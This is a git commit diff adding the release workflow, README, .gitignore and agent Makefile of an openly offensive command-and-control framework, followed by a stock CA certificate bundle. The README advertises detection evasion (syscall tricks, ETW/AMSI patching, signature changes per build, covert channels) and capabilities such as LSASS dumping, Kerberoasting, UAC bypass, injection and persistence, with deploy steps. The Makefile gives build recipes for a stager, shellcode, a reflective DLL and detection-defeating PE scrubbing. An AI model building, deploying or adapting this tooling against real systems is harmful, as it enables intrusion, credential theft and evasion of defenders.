commit f49ee89f0b5f2f45422126b445d82b4535df53fd Author: 28Zaaky <103369140+28Zaaky@users.noreply.github.com> Date: Tue Jun 30 18:02:46 2026 +0300 initial diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml new file mode 100644 index 0000000..ad68637 --- /dev/null +++ b/.github/workflows/release.yml @@ -0,0 +1,68 @@ +name: Release + +on: + push: + tags: + - 'v*' + +permissions: + contents: write + +jobs: + release: + runs-on: ubuntu-22.04 + steps: + - uses: actions/checkout@v4 + + - name: Install toolchain + run: | + sudo apt-get update -qq + sudo apt-get install -y --no-install-recommends \ + gcc-mingw-w64-x86-64 binutils-mingw-w64-x86-64 mingw-w64 make \ + python3 python3-pip nodejs npm + + - name: Install Python deps + run: pip3 install -r server/requirements.txt + + - name: Build UI + run: cd ui && npm ci && npm run build + + - name: Build agent (standalone HTTP — demo build) + run: | + cd agent + touch include/agent_config.h include/evs_strings.h + make standalone BEACON_URL="" + continue-on-error: true + + - name: Create Release + uses: softprops/action-gh-release@v2 + with: + name: KHAØS C2 ${{ github.ref_name }} + files: | + agent/agent.exe + body: | + ## KHAØS C2 ${{ github.ref_name }} + + ### Quick start (Linux VPS) + + ```bash + git clone https://github.com/28Zaaky/khaos-c2 + cd khaos-c2 + sudo bash install.sh + # edit server/config.yaml + python3 server/main.py + ``` + + ### Agent + + Build via the **UI → Build tab** (MinGW is installed by `install.sh`). + No local toolchain required on the operator machine. + + The `agent.exe` attached to this release is a **demo build** (no credentials embedded). + It will not beacon anywhere. Rebuild from the UI after configuring `config.yaml`. + + ### Channels + `Teams` / `GitHub Gist` / `DNS-over-HTTPS` / `HTTP` / `SMB pivot` + Enable only what you need in `config.yaml` — unconfigured channels are skipped. + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..4eb1481 --- /dev/null +++ b/.gitignore @@ -0,0 +1,74 @@ +# .gitignore — KHAØS C2 + +# ── Secrets & credentials ──────────────────────────────────────────────────── +server/config.yaml +server/.env +server/*.pem +server/*.key +server/*.crt +agent/include/agent_config.h +agent/include/evs_strings.h +agent/src/config/agent_config.h + +# ── Landing (served separately — not part of the OSS release) ─────────────── +landing/ + +# ── Internal docs ─────────────────────────────────────────────────────────── +LegitC2_CahierDesCharges.md + +# ── Python ────────────────────────────────────────────────────────────────── +server/venv/ +__pycache__/ +**/__pycache__/ +*.pyc +*.pyo +server/*.db +server/*.log +server/server_out.txt +server/server_err.txt +server/build/ +server/dist/ + +# ── Node / UI ──────────────────────────────────────────────────────────────── +ui/node_modules/ +ui/dist/ +ui/.env +ui/src-tauri/binaries/*.exe + +# ── Agent build artifacts ──────────────────────────────────────────────────── +agent/nul +agent/agent_out*.txt +agent/agent_err*.txt +agent/st?????? +agent/build/ +agent/*.exe +agent/*.dll +agent/*.o +agent/*.a +agent/*.bin +agent/*.bak + +# ── Crypter artifacts ──────────────────────────────────────────────────────── +crypter/output/ +crypter/stub/*.exe +crypter/stub/*.bin +crypter/stub/*.o +crypter/stager/*.exe +crypter/stager/*.bin +crypter/stager/*.o +crypter/stager/stager_cfg.h + +# ── Root artifacts ──────────────────────────────────────────────────────────── +vm_deploy.zip +*.zip +build-linux.sh + +# ── OS ──────────────────────────────────────────────────────────────────────── +.DS_Store +Thumbs.db +desktop.ini + +# ── Editors ────────────────────────────────────────────────────────────────── +.vscode/ +.idea/ +*.swp diff --git a/README.md b/README.md new file mode 100644 index 0000000..3ce07ac --- /dev/null +++ b/README.md @@ -0,0 +1,153 @@ +
+ KHAØS C2 +

KHAØS C2

+

KHAØS is a modern post-exploitation C2 framework with 5 covert channels and full evasion built in, created by @28Zaaky.

+ + [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) + [![Discord](https://img.shields.io/badge/Discord-Join-5865F2?logo=discord&logoColor=white)](https://discord.gg/qNeK6cvwSq) + [![Website](https://img.shields.io/badge/Website-khaos.khaotic.fr-0a0a0a)](https://khaos.khaotic.fr) +
+ +--- + + + +image + + +--- +See the [documentation](https://khaos.khaotic.fr/docs.html) for full instructions. +--- + +## Why KHAØS + +Most open-source C2s have one thing in common: they're already in every EDR vendor's database. KHAØS was built with that in mind from day one. + +The agent is written in C. It uses indirect syscalls, unhooks ntdll from a fresh disk copy, patches ETW and AMSI through hardware breakpoints rather than byte-patching, and obfuscates its stack during sleep. Every build regenerates its string encoding key and credential XOR, so two compiled binaries from the same config never share a static signature. + +On the network side there are five channels: Microsoft Teams, GitHub Gist, DNS-over-HTTPS, HTTP/S, and SMB named pipe. The idea is that at least one of them already looks like normal traffic in whatever environment you're working in. + +Post-exploitation covers the usual ground: shell, execute-assembly (.NET CLR in-process), BOF/COFF loading, four injection techniques, token theft and impersonation, LSASS dump via direct syscall, Kerberoasting, AS-REP roasting, SOCKS5, reverse port forward, and WMI lateral movement. A separate crypter/loader handles in-memory PE mapping if you need to go stageless. + +The operator UI is a React app with a built-in payload builder, live network map, credential store, and screenshot gallery. Everything updates over WebSocket in real time. + +--- + +## Features + +image + +### Channels + +| Channel | Transport | Blends into | +|---------|-----------|-------------| +| Microsoft Teams | HTTPS `*.office.com` | O365 enterprise traffic | +| GitHub Gist | REST `api.github.com` | Developer activity | +| DNS-over-HTTPS | DoH `1.1.1.1` | Encrypted DNS queries | +| HTTP/S | HTTPS | Generic web traffic | +| SMB Named Pipe | SMB | Internal lateral movement | + +Traffic is encrypted with ChaCha20-Poly1305, key exchange via X25519, unique per agent, per session. + +### Post-exploitation + +| Category | Capabilities | +|----------|-------------| +| Execution | Shell, execute-assembly (.NET CLR in-process), BOF/COFF loader, screenshot | +| Injection | Remote thread, thread hijack, EarlyBird APC, module stomp, self-injection | +| Identity | Token steal / make / revert, `getsystem` (3 techniques), UAC bypass (ICMLuaUtil / fodhelper / sdclt) | +| Credentials | LSASS dump (custom minidump), SAM/SYSTEM hive via SeBackupPrivilege, Kerberoast, AS-REP roast | +| Network | SOCKS5 proxy, reverse port forward, SMB pivot, WMI lateral movement | +| Persistence | Registry run key, scheduled task (XML) | + +### Crypter + +Loader that decrypts and reflectively maps the agent PE in memory. + +```bash +cd crypter +python build.py # bake agent + build loader +python build.py --stager-url https://... # with network stager +``` + +--- + +## Quick Start + +### Linux (Kali / Ubuntu / Debian) + +```bash +git clone https://github.com/28Zaaky/khaos-c2 +cd khaos-c2 +python3 -m venv venv && source venv/bin/activate +pip3 install -r server/requirements.txt + +# install Node.js if missing +sudo apt update && sudo apt install nodejs npm -y +cd ui && npm install && npm run build && cd .. + +# TLS cert +openssl req -x509 -newkey rsa:2048 -sha256 -days 365 -nodes \ + -keyout server/cert.key -out server/cert.pem -subj "/CN=khaos-c2" + +cp server/config.example.yaml server/config.yaml +# edit config.yaml: jwt_secret + http.beacon_url +python3 server/main.py +``` + +Agent compiled on Windows (see below), then dropped on target. + +### Windows + +Requires [MSYS2](https://www.msys2.org/) with MinGW-w64. + +```bash +git clone https://github.com/28Zaaky/khaos-c2 +cd khaos-c2 +``` + +```bash +# MSYS2 shell — install build deps once +pacman -S mingw-w64-x86_64-gcc mingw-w64-x86_64-mbedtls +``` + +```bash +# Server +cd server +python -m venv venv +venv\Scripts\activate +pip install -r requirements.txt +copy config.example.yaml config.yaml +python main.py +``` + +```bash +# UI (separate terminal) +cd ui && npm install && npm run dev # → http://localhost:5173 +``` + +```powershell +# Agent +.\agent\rebuild_agent.ps1 # runs make config + make lean, kills running agent first +# or: cd agent && make config && make standalone +``` + +Default login: `operator` / `changeme` + +--- + +## Community + +Discord: https://discord.gg/qNeK6cvwSq + +--- + +## Legal + +For authorized security testing only. Using this tool against systems you do not own or have explicit written permission to test is illegal. + +--- + +*Built by [28Zaaky](https://github.com/28Zaaky/)* diff --git a/agent/Makefile b/agent/Makefile new file mode 100644 index 0000000..acc14c9 --- /dev/null +++ b/agent/Makefile @@ -0,0 +1,315 @@ +# ── Toolchain detection — Windows (MSYS2) or Linux (cross-compile) ────────── +ifeq ($(OS),Windows_NT) + MSYS2 ?= C:/msys64/mingw64 + CC ?= $(MSYS2)/bin/gcc.exe + STRIP ?= $(MSYS2)/bin/strip.exe + OBJCOPY ?= $(MSYS2)/bin/objcopy.exe + WINDRES ?= $(MSYS2)/bin/windres.exe + PYTHON ?= python + # Force linker temp dir (ld.exe ignores shell TEMP on some MSYS2 setups) + export TMP := $(or $(TMP),$(TEMP),C:/Windows/Temp) + export TEMP := $(TMP) +else + # Ubuntu/Debian: apt install gcc-mingw-w64-x86-64 mingw-w64 + MSYS2 ?= /usr/x86_64-w64-mingw32 + CC ?= x86_64-w64-mingw32-gcc + STRIP ?= x86_64-w64-mingw32-strip + OBJCOPY ?= x86_64-w64-mingw32-objcopy + WINDRES ?= x86_64-w64-mingw32-windres + PYTHON ?= python3 +endif + +# Guard: must run make from the agent/ directory (include/bof.h must be reachable) +ifeq ($(wildcard include/bof.h),) + $(error Run make from the agent/ directory, not from: $(CURDIR)) +endif + +BUILDDIR = . + +# -DCURL_STATICLIB removed: curl linked dynamically (libcurl-4.dll) +JITTER_PCT ?= 40 +# -fno-ident : supprime la string "GCC: (x86_64-posix-seh...)" dans .comment +# -fno-asynchronous-unwind-tables : supprime .eh_frame (réduit surface heuristique) +# -fno-exceptions : pas d'exception C++ → pas de .pdata/.xdata MSVC-style +# -Wl,--no-insert-timestamp : ld n'écrit pas de timestamp (pe_scrub en met un aléatoire) +CFLAGS = -O2 -Wall -Wextra -DNDEBUG -DWIN32_LEAN_AND_MEAN \ + -fno-ident -fno-asynchronous-unwind-tables -fno-exceptions \ + -fno-stack-protector \ + -DJITTER_PCT=$(JITTER_PCT) + +# Mixed linking: -mwindows suppresses console +# curl = dynamic (DLL), mbedTLS = static, stdlib = static +LDFLAGS = -mwindows -static-libgcc -static-libstdc++ -Wl,--no-insert-timestamp + +INCLUDE = -Iinclude \ + -I$(MSYS2)/include + +LIBPATH = -L$(MSYS2)/lib + +# mbedTLS static, curl dynamic (avoids HTTP/3 static dep chain) +LIBS = -Wl,-Bstatic -lmbedcrypto -lbcrypt \ + -Wl,-Bdynamic -lcurl \ + -Wl,-Bstatic -lws2_32 -lwinhttp -lnetapi32 -ladvapi32 \ + -lwldap32 -lcrypt32 -lsecur32 -liphlpapi \ + -lgdi32 -lole32 -loleaut32 -luuid + +# Standalone: HTTP channel only (WinHTTP loaded at runtime — no IAT entry) +# Excludes teams.c / github.c / doh.c — no libcurl required. +LIBS_SA = -Wl,-Bstatic -lmbedcrypto -lbcrypt \ + -Wl,-Bstatic -lws2_32 -lnetapi32 -ladvapi32 \ + -lwldap32 -lcrypt32 -lsecur32 -liphlpapi \ + -lgdi32 -lole32 -loleaut32 -luuid + +SRC_SA = src/main.c \ + src/beacon.c \ + src/util.c \ + src/adv_lazy.c \ + src/evs.c \ + src/crypto/chacha.c \ + src/crypto/handshake.c \ + src/channels/http.c \ + src/channels/http_only.c \ + src/commands/shell.c \ + src/commands/upload.c \ + src/commands/download.c \ + src/commands/ps.c \ + src/commands/getpid.c \ + src/commands/token.c \ + src/commands/screenshot.c \ + src/commands/execasm.c \ + src/commands/fs.c \ + src/commands/reg.c \ + src/commands/lsass.c \ + src/commands/hashdump.c \ + src/commands/portscan.c \ + src/commands/spawn.c \ + src/commands/wmi.c \ + src/commands/kerberos.c \ + src/commands/uac.c \ + src/commands/getsystem.c \ + src/commands/lpe_check.c \ + src/channels/smb.c \ + src/evasion/evasion.c \ + src/inject/inject.c \ + src/inject/spoof_stub.S \ + src/persist/persist.c \ + src/bof/bof.c \ + src/socks/socks.c \ + src/socks/rportfwd.c + +# Lean: no inject/screenshot/lsass/hashdump/kerberos/execasm — minimal capability surface +SRC_LEAN = src/main.c \ + src/beacon.c \ + src/util.c \ + src/adv_lazy.c \ + src/evs.c \ + src/crypto/chacha.c \ + src/crypto/handshake.c \ + src/channels/http.c \ + src/channels/http_only.c \ + src/commands/shell.c \ + src/commands/upload.c \ + src/commands/download.c \ + src/commands/ps.c \ + src/commands/getpid.c \ + src/commands/token.c \ + src/commands/fs.c \ + src/commands/reg.c \ + src/commands/portscan.c \ + src/commands/spawn.c \ + src/commands/wmi.c \ + src/commands/uac.c \ + src/commands/getsystem.c \ + src/commands/lpe_check.c \ + src/channels/smb.c \ + src/evasion/evasion.c \ + src/inject/inject_stub.c \ + src/persist/persist.c \ + src/bof/bof.c \ + src/socks/socks.c \ + src/socks/rportfwd.c + +SRC = src/main.c \ + src/beacon.c \ + src/util.c \ + src/adv_lazy.c \ + src/evs.c \ + src/crypto/chacha.c \ + src/crypto/handshake.c \ + src/channels/github.c \ + src/channels/http.c \ + src/channels/teams.c \ + src/channels/doh.c \ + src/commands/shell.c \ + src/commands/upload.c \ + src/commands/download.c \ + src/commands/ps.c \ + src/commands/getpid.c \ + src/commands/token.c \ + src/commands/screenshot.c \ + src/commands/execasm.c \ + src/commands/fs.c \ + src/commands/reg.c \ + src/commands/lsass.c \ + src/commands/hashdump.c \ + src/commands/portscan.c \ + src/commands/spawn.c \ + src/commands/wmi.c \ + src/commands/kerberos.c \ + src/commands/uac.c \ + src/commands/getsystem.c \ + src/commands/lpe_check.c \ + src/channels/smb.c \ + src/evasion/evasion.c \ + src/inject/inject.c \ + src/inject/spoof_stub.S \ + src/persist/persist.c \ + src/bof/bof.c \ + src/socks/socks.c \ + src/socks/rportfwd.c + +TARGET = $(BUILDDIR)/agent.exe +RES_SRC = res/agent.rc +RES_OBJ = $(BUILDDIR)/agent_res.o + +# DLLs to ship alongside agent.exe (copy from MSYS2 after build) +DLLS = $(MSYS2)/bin/libcurl-4.dll \ + $(MSYS2)/bin/libssl-3.dll \ + $(MSYS2)/bin/libcrypto-3.dll + +LIFTER_SRC = src/lifter/lifter.c \ + src/evs.c + +LIFTER_LIBS = -Wl,-Bstatic -ladvapi32 -lshell32 -luser32 -lkernel32 \ + -lole32 -luuid + +STAGER_SRC = src/stager/stager.c \ + src/stager/hollow.c \ + src/crypto/chacha.c \ + src/evs.c + +STAGER_LIBS = -Wl,-Bstatic -lmbedcrypto -lbcrypt \ + -Wl,-Bstatic -lws2_32 -lwinhttp -ladvapi32 \ + -lwldap32 -lcrypt32 -lsecur32 \ + -lgdi32 -lole32 -loleaut32 -luuid + +$(RES_OBJ): $(RES_SRC) res/agent.manifest + $(WINDRES) -i $(RES_SRC) --input-format=rc -o $(RES_OBJ) --output-format=coff + +all: config $(RES_OBJ) $(TARGET) + +lifter: + $(CC) -O2 -Wall -Wextra -DNDEBUG -DWIN32_LEAN_AND_MEAN \ + $(INCLUDE) $(LIFTER_SRC) \ + $(LIBPATH) $(LIFTER_LIBS) \ + -mwindows -static-libgcc \ + -o lifter.exe + $(STRIP) --strip-all lifter.exe + @echo "[ok] lifter.exe" + +standalone: config $(RES_OBJ) + $(CC) $(CFLAGS) -DHTTP_ONLY $(INCLUDE) $(SRC_SA) $(RES_OBJ) $(LIBPATH) $(LIBS_SA) $(LDFLAGS) -o $(TARGET) + $(STRIP) --strip-all $(TARGET) + $(OBJCOPY) --strip-debug $(TARGET) + $(PYTHON) tools/pe_scrub.py $(TARGET) + @echo "[ok] standalone built $(TARGET) (no curl DLL)" + +stager: stager-config stager-only + +stager-config: + $(PYTHON) tools/gen_stager_config.py --url "$(STAGE_URL)" --key "$(STAGE_KEY)" + +# stager-only: compile stager without regenerating stager_config.h +# Used by the payload builder API (config already written by the server). +stager-only: + $(CC) $(CFLAGS) -DHTTP_ONLY $(INCLUDE) $(STAGER_SRC) $(LIBPATH) $(STAGER_LIBS) $(LDFLAGS) -o stager.exe + @echo "[ok] stager.exe" + +# shellcode-only: convert agent.exe → agent.bin via donut +# Requires: pip install donut-shellcode +# Note: run build-only first to produce agent.exe +shellcode-only: + $(PYTHON) tools/pe2sc.py $(BUILDDIR)/agent.exe $(BUILDDIR)/agent.bin + @echo "[ok] shellcode agent.bin" + +# reflective-dll-only: build agent as a reflective DLL (no console, no WinMain). +# The DLL exports "ReflectiveLoader" — any injector can find it by EAT and call +# it to self-load the agent into memory without LoadLibrary. +# -shared / -Wl,--dll : produce a PE DLL +# -D_REFLECTIVE_DLL : switches main.c to agent_main() + includes dllmain.c/reflect.c +# -Wl,--export-all-symbols omitted: only ReflectiveLoader needs export (in reflect.c) +reflective-dll-only: + $(CC) $(CFLAGS) -D_REFLECTIVE_DLL -DHTTP_ONLY -shared \ + $(INCLUDE) \ + $(SRC_SA) \ + src/reflect/reflect.c \ + src/reflect/dllmain.c \ + $(LIBPATH) $(LIBS_SA) \ + -static-libgcc -static-libstdc++ \ + -Wl,--dll \ + -o $(BUILDDIR)/agent.dll + @echo "[ok] agent.dll (reflective)" + +# lean: reduced surface — no inject/screenshot/lsass/hashdump/kerberos/execasm +lean: config $(RES_OBJ) + $(CC) $(CFLAGS) -DHTTP_ONLY -DLEAN $(INCLUDE) $(SRC_LEAN) $(RES_OBJ) $(LIBPATH) $(LIBS_SA) $(LDFLAGS) -o $(TARGET) + $(STRIP) --strip-all $(TARGET) + $(OBJCOPY) --strip-debug $(TARGET) + $(PYTHON) tools/pe_scrub.py $(TARGET) + @echo "[ok] lean build $(TARGET)" + +# build-only: compile standalone without regenerating agent_config.h +# Used by the payload builder API (config already written by the server). +build-only: $(RES_OBJ) + $(CC) $(CFLAGS) -DHTTP_ONLY $(INCLUDE) $(SRC_SA) $(RES_OBJ) $(LIBPATH) $(LIBS_SA) $(LDFLAGS) -o $(TARGET) + $(STRIP) --strip-all $(TARGET) + $(OBJCOPY) --strip-debug $(TARGET) + $(PYTHON) tools/pe_scrub.py $(TARGET) + @echo "[ok] build-only $(TARGET)" + +config: + $(PYTHON) tools/obfuscate.py + $(PYTHON) tools/gen_evs_strings.py + +$(TARGET): $(SRC) $(RES_OBJ) + $(CC) $(CFLAGS) $(INCLUDE) $(SRC) $(RES_OBJ) $(LIBPATH) $(LIBS) $(LDFLAGS) -o $(TARGET) + $(STRIP) --strip-all $(TARGET) + $(OBJCOPY) --strip-debug $(TARGET) + @echo "[ok] built $(TARGET)" + +# Copy required DLLs next to the binary +bundle: $(TARGET) + @for dll in $(DLLS); do \ + cp -v "$$dll" . 2>/dev/null || true; \ + done + +strip: $(TARGET) + $(STRIP) --strip-all $(TARGET) + $(OBJCOPY) --strip-debug $(TARGET) + @echo "[ok] stripped" + +relay: + $(CC) -O2 -Wall -DNDEBUG -DWIN32_LEAN_AND_MEAN \ + $(INCLUDE) src/relay/smb_relay.c \ + $(LIBPATH) \ + -Wl,-Bstatic -lws2_32 -lwinhttp -ladvapi32 \ + -lwldap32 -lcrypt32 -lsecur32 \ + -lgdi32 -lole32 -loleaut32 -luuid \ + -static-libgcc \ + -o smb_relay.exe + @echo "[ok] smb_relay.exe" + +debug: + $(CC) $(CFLAGS) -DHTTP_ONLY -DBEACON_INTERVAL=3000 -DJITTER_PCT=0 -DSKIP_EVASION \ + $(INCLUDE) $(SRC_SA) $(LIBPATH) $(LIBS_SA) $(LDFLAGS) -o $(BUILDDIR)/agent_debug.exe + $(STRIP) --strip-all $(BUILDDIR)/agent_debug.exe + @echo "[ok] agent_debug.exe (interval=3s, no jitter, stripped)" + +clean: +ifeq ($(OS),Windows_NT) + del /Q "$(BUILDDIR)\agent.exe" "$(BUILDDIR)\agent_res.o" 2>nul || true +else + rm -f $(BUILDDIR)/agent.exe $(BUILDDIR)/agent_res.o +endif + +.PHONY: all standalone lean build-only debug stager stager-config stager-only shellcode-only reflective-dll-only bundle strip relay clean diff --git a/agent/curl-ca-bundle.crt b/agent/curl-ca-bundle.crt new file mode 100644 index 0000000..e9bc8e3 --- /dev/null +++ b/agent/curl-ca-bundle.crt @@ -0,0 +1,3996 @@ +# AC RAIZ FNMT-RCM +-----BEGIN CERTIFICATE----- +MIIFgzCCA2ugAwIBAgIPXZONMGc2yAYdGsdUhGkHMA0GCSqGSIb3DQEBCwUAMDsx +CzAJBgNVBAYTAkVTMREwDwYDVQQKDAhGTk1ULVJDTTEZMBcGA1UECwwQQUMgUkFJ +WiBGTk1ULVJDTTAeFw0wODEwMjkxNTU5NTZaFw0zMDAxMDEwMDAwMDBaMDsxCzAJ +BgNVBAYTAkVTMREwDwYDVQQKDAhGTk1ULVJDTTEZMBcGA1UECwwQQUMgUkFJWiBG +Tk1ULVJDTTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALpxgHpMhm5/ +yBNtwMZ9HACXjywMI7sQmkCpGreHiPibVmr75nuOi5KOpyVdWRHbNi63URcfqQgf +BBckWKo3Shjf5TnUV/3XwSyRAZHiItQDwFj8d0fsjz50Q7qsNI1NOHZnjrDIbzAz +WHFctPVrbtQBULgTfmxKo0nRIBnuvMApGGWn3v7v3QqQIecaZ5JCEJhfTzC8PhxF +tBDXaEAUwED653cXeuYLj2VbPNmaUtu1vZ5Gzz3rkQUCwJaydkxNEJY7kvqcfw+Z +374jNUUeAlz+taibmSXaXvMiwzn15Cou08YfxGyqxRxqAQVKL9LFwag0Jl1mpdIC +IfkYtwb1TplvqKtMUejPUBjFd8g5CSxJkjKZqLsXF3mwWsXmo8RZZUc1g16p6DUL +mbvkzSDGm0oGObVo/CK67lWMK07q87Hj/LaZmtVC+nFNCM+HHmpxffnTtOmlcYF7 +wk5HlqX2doWjKI/pgG6BU6VtX7hI+cL5NqYuSf+4lsKMB7ObiFj86xsc3i1w4peS +MKGJ47xVqCfWS+2QrYv6YyVZLag13cqXM7zlzced0ezvXg5KkAYmY6252TUtB7p2 +ZSysV4999AeU14ECll2jB0nVetBX+RvnU0Z1qrB5QstocQjpYL05ac70r8NWQMet +UqIJ5G+GR4of6ygnXYMgrwTJbFaai0b1AgMBAAGjgYMwgYAwDwYDVR0TAQH/BAUw +AwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFPd9xf3E6Jobd2Sn9R2gzL+H +YJptMD4GA1UdIAQ3MDUwMwYEVR0gADArMCkGCCsGAQUFBwIBFh1odHRwOi8vd3d3 +LmNlcnQuZm5tdC5lcy9kcGNzLzANBgkqhkiG9w0BAQsFAAOCAgEAB5BK3/MjTvDD +nFFlm5wioooMhfNzKWtN/gHiqQxjAb8EZ6WdmF/9ARP67Jpi6Yb+tmLSbkyU+8B1 +RXxlDPiyN8+sD8+Nb/kZ94/sHvJwnvDKuO+3/3Y3dlv2bojzr2IyIpMNOmqOFGYM +LVN0V2Ue1bLdI4E7pWYjJ2cJj+F3qkPNZVEI7VFY/uY5+ctHhKQV8Xa7pO6kO8Rf +77IzlhEYt8llvhjho6Tc+hj507wTmzl6NLrTQfv6MooqtyuGC2mDOL7Nii4LcK2N +JpLuHvUBKwrZ1pebbuCoGRw6IYsMHkCtA+fdZn71uSANA+iW+YJF1DngoABd15jm +fZ5nc8OaKveri6E6FO80vFIOiZiaBECEHX5FaZNXzuvO+FB8TxxuBEOb+dY7Ixjp +6o7RTUaN8Tvkasq6+yO3m/qZASlaWFot4/nUbQ4mrcFuNLwy+AwF+mWj2zs3gyLp +1txyM/1d8iC9djwj2ij3+RvrWWTV3F9yfiD8zYm1kGdNYno/Tq0dwzn+evQoFt9B +9kiABdcPUXmsEKvU7ANm5mqwujGSQkBqvjrTcuFqN1W8rB2Vt2lh8kORdOag0wok +RqEIr9baRRmW1FMdW4R58MD3R++Lj8UGrp1MYp3/RgT408m2ECVAdf4WqslKYIYv +uu8wd+RU4riEmViAqhOLUTpPSPaLtrM= +-----END CERTIFICATE----- + +# AC RAIZ FNMT-RCM SERVIDORES SEGUROS +-----BEGIN CERTIFICATE----- +MIICbjCCAfOgAwIBAgIQYvYybOXE42hcG2LdnC6dlTAKBggqhkjOPQQDAzB4MQsw +CQYDVQQGEwJFUzERMA8GA1UECgwIRk5NVC1SQ00xDjAMBgNVBAsMBUNlcmVzMRgw +FgYDVQRhDA9WQVRFUy1RMjgyNjAwNEoxLDAqBgNVBAMMI0FDIFJBSVogRk5NVC1S +Q00gU0VSVklET1JFUyBTRUdVUk9TMB4XDTE4MTIyMDA5MzczM1oXDTQzMTIyMDA5 +MzczM1oweDELMAkGA1UEBhMCRVMxETAPBgNVBAoMCEZOTVQtUkNNMQ4wDAYDVQQL +DAVDZXJlczEYMBYGA1UEYQwPVkFURVMtUTI4MjYwMDRKMSwwKgYDVQQDDCNBQyBS +QUlaIEZOTVQtUkNNIFNFUlZJRE9SRVMgU0VHVVJPUzB2MBAGByqGSM49AgEGBSuB +BAAiA2IABPa6V1PIyqvfNkpSIeSX0oNnnvBlUdBeh8dHsVnyV0ebAAKTRBdp20LH +sbI6GA60XYyzZl2hNPk2LEnb80b8s0RpRBNm/dfF/a82Tc4DTQdxz69qBdKiQ1oK +Um8BA06Oi6NCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYD +VR0OBBYEFAG5L++/EYZg8k/QQW6rcx/n0m5JMAoGCCqGSM49BAMDA2kAMGYCMQCu +SuMrQMN0EfKVrRYj3k4MGuZdpSRea0R7/DjiT8ucRRcRTBQnJlU5dUoDzBOQn5IC +MQD6SmxgiHPz7riYYqnOK8LZiqZwMR2vsJRM60/G49HzYqc8/5MuB1xJAWdpEgJy +v+c= +-----END CERTIFICATE----- + +# ACCVRAIZ1 +-----BEGIN CERTIFICATE----- +MIIH0zCCBbugAwIBAgIIXsO3pkN/pOAwDQYJKoZIhvcNAQEFBQAwQjESMBAGA1UE +AwwJQUNDVlJBSVoxMRAwDgYDVQQLDAdQS0lBQ0NWMQ0wCwYDVQQKDARBQ0NWMQsw +CQYDVQQGEwJFUzAeFw0xMTA1MDUwOTM3MzdaFw0zMDEyMzEwOTM3MzdaMEIxEjAQ +BgNVBAMMCUFDQ1ZSQUlaMTEQMA4GA1UECwwHUEtJQUNDVjENMAsGA1UECgwEQUND +VjELMAkGA1UEBhMCRVMwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCb +qau/YUqXry+XZpp0X9DZlv3P4uRm7x8fRzPCRKPfmt4ftVTdFXxpNRFvu8gMjmoY +HtiP2Ra8EEg2XPBjs5BaXCQ316PWywlxufEBcoSwfdtNgM3802/J+Nq2DoLSRYWo +G2ioPej0RGy9ocLLA76MPhMAhN9KSMDjIgro6TenGEyxCQ0jVn8ETdkXhBilyNpA +lHPrzg5XPAOBOp0KoVdDaaxXbXmQeOW1tDvYvEyNKKGno6e6Ak4l0Squ7a4DIrhr +IA8wKFSVf+DuzgpmndFALW4ir50awQUZ0m/A8p/4e7MCQvtQqR0tkw8jq8bBD5L/ +0KIV9VMJcRz/RROE5iZe+OCIHAr8Fraocwa48GOEAqDGWuzndN9wrqODJerWx5eH +k6fGioozl2A3ED6XPm4pFdahD9GILBKfb6qkxkLrQaLjlUPTAYVtjrs78yM2x/47 +4KElB0iryYl0/wiPgL/AlmXz7uxLaL2diMMxs0Dx6M/2OLuc5NF/1OVYm3z61PMO +m3WR5LpSLhl+0fXNWhn8ugb2+1KoS5kE3fj5tItQo05iifCHJPqDQsGH+tUtKSpa +cXpkatcnYGMN285J9Y0fkIkyF/hzQ7jSWpOGYdbhdQrqeWZ2iE9x6wQl1gpaepPl +uUsXQA+xtrn13k/c4LOsOxFwYIRKQ26ZIMApcQrAZQIDAQABo4ICyzCCAscwfQYI +KwYBBQUHAQEEcTBvMEwGCCsGAQUFBzAChkBodHRwOi8vd3d3LmFjY3YuZXMvZmls +ZWFkbWluL0FyY2hpdm9zL2NlcnRpZmljYWRvcy9yYWl6YWNjdjEuY3J0MB8GCCsG +AQUFBzABhhNodHRwOi8vb2NzcC5hY2N2LmVzMB0GA1UdDgQWBBTSh7Tj3zcnk1X2 +VuqB5TbMjB4/vTAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNKHtOPfNyeT +VfZW6oHlNsyMHj+9MIIBcwYDVR0gBIIBajCCAWYwggFiBgRVHSAAMIIBWDCCASIG +CCsGAQUFBwICMIIBFB6CARAAQQB1AHQAbwByAGkAZABhAGQAIABkAGUAIABDAGUA +cgB0AGkAZgBpAGMAYQBjAGkA8wBuACAAUgBhAO0AegAgAGQAZQAgAGwAYQAgAEEA +QwBDAFYAIAAoAEEAZwBlAG4AYwBpAGEAIABkAGUAIABUAGUAYwBuAG8AbABvAGcA +7QBhACAAeQAgAEMAZQByAHQAaQBmAGkAYwBhAGMAaQDzAG4AIABFAGwAZQBjAHQA +cgDzAG4AaQBjAGEALAAgAEMASQBGACAAUQA0ADYAMAAxADEANQA2AEUAKQAuACAA +QwBQAFMAIABlAG4AIABoAHQAdABwADoALwAvAHcAdwB3AC4AYQBjAGMAdgAuAGUA +czAwBggrBgEFBQcCARYkaHR0cDovL3d3dy5hY2N2LmVzL2xlZ2lzbGFjaW9uX2Mu +aHRtMFUGA1UdHwROMEwwSqBIoEaGRGh0dHA6Ly93d3cuYWNjdi5lcy9maWxlYWRt +aW4vQXJjaGl2b3MvY2VydGlmaWNhZG9zL3JhaXphY2N2MV9kZXIuY3JsMA4GA1Ud +DwEB/wQEAwIBBjAXBgNVHREEEDAOgQxhY2N2QGFjY3YuZXMwDQYJKoZIhvcNAQEF +BQADggIBAJcxAp/n/UNnSEQU5CmH7UwoZtCPNdpNYbdKl02125DgBS4OxnnQ8pdp +D70ER9m+27Up2pvZrqmZ1dM8MJP1jaGo/AaNRPTKFpV8M9xii6g3+CfYCS0b78gU +JyCpZET/LtZ1qmxNYEAZSUNUY9rizLpm5U9EelvZaoErQNV/+QEnWCzI7UiRfD+m +AM/EKXMRNt6GGT6d7hmKG9Ww7Y49nCrADdg9ZuM8Db3VlFzi4qc1GwQA9j9ajepD 